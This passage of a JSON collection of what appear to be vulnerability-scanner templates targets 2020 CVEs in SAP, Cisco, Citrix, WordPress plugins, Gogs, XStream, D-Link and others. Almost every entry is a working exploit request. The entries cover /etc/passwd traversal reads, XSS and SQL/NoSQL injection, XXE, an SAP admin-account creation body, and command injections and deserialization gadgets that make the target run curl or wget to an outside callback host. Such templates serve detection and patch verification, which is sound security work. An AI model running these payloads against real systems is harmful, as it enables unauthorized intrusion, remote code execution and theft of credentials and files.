Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7318","info":{"name":"McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Policy Name","'\"><svg/onload=alert(document.domain)>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6287","info":{"name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","severity":"critical"},"requests":[{"raw":["POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>\n  CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\n</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CTCWebServiceSi","SOAP-ENV"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24148","info":{"name":"Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml"],"body":"type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-17519","info":{"name":"Apache Flink - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26876","info":{"name":"WordPress WP Courses Plugin Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/lesson/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["rest_post_invalid_id","\"(guid|title|content|excerpt)\":{\"rendered\":"],"condition":"or"},{"type":"status","status":[200,404],"condition":"or"}]}]},{"id":"CVE-2020-25078","info":{"name":"D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/config/getuser?index=0"],"matchers-condition":"and","matchers":[{"type":"word","words":["name=","pass="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17506","info":{"name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"],"host-redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","words":["artica-applianc"]},{"type":"word","part":"header","words":["PHPSESSID"]},{"type":"status","status":[200,301,302],"condition":"or"}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2020-35234","info":{"name":"SMTP WP Plugin Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/easy-wp-smtp/","{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"],"matchers":[{"type":"word","words":["debug","log","Index of"],"condition":"and"}]}]},{"id":"CVE-2020-11991","info":{"name":"Apache Cocoon 2.1.12 - XML Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/v2/api/product/manger/getInfo"],"body":"<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName>\n<lastName>&ent;</lastName>\n</userInfo>\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3580","info":{"name":"Cisco ASA/FTD Software - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/{{randstr}}/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9376","info":{"name":"D-Link DIR-610 Devices - Information Disclosure","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>Admin</name>","</usrid>","</password>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10973","info":{"name":"WAVLINK - Access Control","severity":"high"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-21224","info":{"name":"Inspur ClusterEngine 4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"op=login&username=;`cat /etc/passwd`&password=\n","headers":{"Content-Type":"application/x-www-form-urlencoded","Referer":"{{Hostname}}/module/login/login.html"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8209","info":{"name":"Citrix XenMobile Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["fileDownload=true","application/octet-stream","attachment;"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-19282","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6308","info":{"name":"SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /AdminTools/querybuilder/logon?framework= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"location","words":["{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"]}]}]},{"id":"CVE-2020-3452","info":{"name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"],"matchers":[{"type":"word","words":["INTERNAL_PASSWORD_ENABLED","CONF_VIRTUAL_KEYBOARD"],"condition":"and"}]}]},{"id":"CVE-2020-13820","info":{"name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus='alert(document.domain)","Extreme Management Center"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15867","info":{"name":"Gogs 0.5.5 - 0.12.2 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-35848","info":{"name":"Agentejo Cockpit <0.12.0 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/newpassword"],"body":"{\n  \"token\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers":[{"type":"regex","part":"body","regex":["string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\""]}]}]},{"id":"CVE-2020-6207","info":{"name":"SAP Solution Manager 7.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /EemAdminService/EemAdmin HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:adm=\"http://sap.com/smd/eem/admin/\"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":Envelope",":Body",":getAllAgentInfoResponse"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7136","info":{"name":"HPE Smart Update Manager < 8.5.6 - Remote Unauthorized Access","severity":"critical"},"requests":[{"raw":["POST /session/create HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"hapi\":{\"username\":\"Administrator\",\"password\":\"any_password\",\"language\":\"en\",\"mode\":\"gui\", \"usesshkey\":true, \"privatekey\":\"any_privateky\", \"passphrase\":\"any_passphase\",\"settings\":{\"output_filter\":\"passed\",\"port_number\":\"444\"}}}\n","GET /session/{{sessionid}}/node/index HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["hmessage","Command completed successfully.","node_name"],"condition":"and"}],"extractors":[{"type":"regex","name":"sessionid","group":1,"regex":["\"sessionId\":\"([a-z0-9.]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-7796","info":{"name":"Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-9425","info":{"name":"rConfig <3.9.4 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/settings.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["defaultNodeUsername","defaultNodePassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8191","info":{"name":"Citrix ADC/Gateway - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /menu/stapp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-NITRO-USER: xpyZxwy6\n\nsid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</title><script>alert(31337)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22208","info":{"name":"74cms - ajax_street.php 'x' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11\ufffd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-14408","info":{"name":"Agentejo Cockpit 0.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["redirectTo = '/92874';alert(document.domain)//280';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28976","info":{"name":"WordPress Canto 1.3.0 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["null"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23972","info":{"name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"option\"\n\ncom_gmapfp\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\nContent-Type: text/html\n\nprojectdiscovery\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"no_html\"\n\nno_html\n------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n"],"payloads":{"component":["com_gmapfp","comgmapfp"]},"extractors":[{"type":"regex","regex":["window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"],"part":"body"}]}]},{"id":"CVE-2020-17456","info":{"name":"SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserTime=081119502020&currentTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n","POST /cgi-bin/system_log.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCommand=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8771","info":{"name":"WordPress Time Capsule < 1.21.16 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n\nIWP_JSON_PREFIX\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"adminmenumain\" role=\"navigation\" aria-label=\"Main menu\">","<h1>Dashboard</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"],"part":"header"}]}]},{"id":"CVE-2020-26073","info":{"name":"Cisco SD-WAN vManage Software - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"regex","regex":["root:.*:0:0:"],"part":"body"}]}]},{"id":"CVE-2020-20300","info":{"name":"WeiPHP 5.0 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["52c69e3a57331081823331c4e69d3f2"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-35846","info":{"name":"Agentejo Cockpit < 0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/check"],"body":"{\n  \"auth\": {\n    \"user\": {\n      \"$eq\": \"admin\"\n    },\n    \"password\": [\n      0\n    ]\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password_verify() expects parameter"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13937","info":{"name":"Apache Kylin - Exposed Configuration File","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/kylin/api/admin/config"],"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["config","kylin.metadata.url"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11530","info":{"name":"WordPress Chop Slider 3 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/javascript\")","contains(body, \"$(document).ready(function()\")"],"condition":"and"}]}]},{"id":"CVE-2020-23575","info":{"name":"Kyocera Printer d-COPIA253MF - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:.*:0:0:","bin:.*:1:1"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36112","info":{"name":"CSE Bookstore 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["get book price failed! You have an error in your SQL syntax","Can't retrieve data You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2020-35476","info":{"name":"OpenTSDB <=2.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plotted","timing","cachehit"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24550","info":{"name":"EpiServer Find <13.2.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2020-26217","info":{"name":"XStream <1.4.14 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n            <contentType>text/plain</contentType>\n            <is class='java.io.SequenceInputStream'>\n              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n                <iterator class='javax.imageio.spi.FilterIterator'>\n                  <iter class='java.util.ArrayList$Itr'>\n                    <cursor>0</cursor>\n                    <lastRet>-1</lastRet>\n                    <expectedModCount>1</expectedModCount>\n                    <outer-class>\n                      <java.lang.ProcessBuilder>\n                        <command>\n                          <string>curl</string>\n                          <string>http://{{interactsh-url}}</string>\n                        </command>\n                      </java.lang.ProcessBuilder>\n                    </outer-class>\n                  </iter>\n                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>start</name>\n                  </filter>\n                  <next/>\n                </iterator>\n                <type>KEYS</type>\n              </e>\n              <in class='java.io.ByteArrayInputStream'>\n                <buf></buf>\n                <pos>0</pos>\n                <mark>0</mark>\n                <count>0</count>\n              </in>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-29164","info":{"name":"PacsOne Server <7.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=\"\" onerror=\"alert(1);\">1</img>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15227","info":{"name":"Nette Framework - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35984","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-17530","info":{"name":"Apache Struts 2.0.0-2.5.25 - Remote Code 